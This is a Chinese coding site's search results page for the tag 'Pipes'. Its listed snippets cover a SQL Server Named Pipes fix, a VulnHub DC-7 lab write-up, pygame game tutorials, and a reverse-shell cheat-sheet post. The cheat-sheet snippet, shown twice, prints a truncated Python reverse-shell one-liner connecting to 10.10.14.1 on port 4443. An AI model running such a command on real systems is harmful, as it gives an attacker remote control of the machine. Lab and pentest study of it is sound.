网站首页 站内搜索

搜索结果

查询Tags标签: Pipes,共有 8条记录
  • [ODBC Driver 17 for SQL Server]Named Pipes Provider: Could not open a connection to SQL Server [5].

    当这个出现时在cmd命令中cliconfig会弹出这样一个界面把TCP/IP加到启用列表中,然后应用并确定。主机名或IP地址那里改为 ip,port 详细操作请看:::https://blog.csdn.net/luke312/article/details/114652572

    2022/4/22 19:16:52 人评论 次浏览
  • vulnhub靶机-DC7-Writeup

    0x01 介绍 靶机地址:https://www.vulnhub.com/entry/dc-7,356/DESCRIPTION DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn’t an overly technical challenge, it isn’t…

    2021/12/9 23:50:39 人评论 次浏览
  • vulnhub靶机-DC7-Writeup

    0x01 介绍 靶机地址:https://www.vulnhub.com/entry/dc-7,356/DESCRIPTION DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn’t an overly technical challenge, it isn’t…

    2021/12/9 23:50:39 人评论 次浏览
  • 反弹shell及其脚本

    反弹shell及其脚本 一、反弹shell的各种姿势pythonpython -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subp…

    2021/11/22 7:09:44 人评论 次浏览
  • 反弹shell及其脚本

    反弹shell及其脚本 一、反弹shell的各种姿势pythonpython -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subp…

    2021/11/22 7:09:44 人评论 次浏览
  • python编写呆呆小鸟游戏

    ####################引用数据库与函数###################### import pygame from random import randrange pygame.init() from time import sleep######################定义变量########################### frame = 0 #当前在0帧处 map_width = 284 map_height = 51…

    2021/11/11 1:10:39 人评论 次浏览
  • python编写呆呆小鸟游戏

    ####################引用数据库与函数###################### import pygame from random import randrange pygame.init() from time import sleep######################定义变量########################### frame = 0 #当前在0帧处 map_width = 284 map_height = 51…

    2021/11/11 1:10:39 人评论 次浏览
  • 【python实战】使用 pygame 写一个 flappy-bird 类小游戏 | 涉及思路+项目结构+代码详解 | 新手向

    基于 pygame 的 Amazing-brick 实现 本文涉及三个 .py 文件: amazing_brick / amazing_brick_utils.py/ wrapped_amazing_brick.py keyboard_play.py项目地址:https://github.com/PiperLiu/Amazing-Brick-DFS-and-DRL微信公众号:Piper蛋窝Bilibili:枇杷鹭设计思路 从玩…

    2021/6/22 17:29:43 人评论 次浏览
扫一扫关注最新编程教程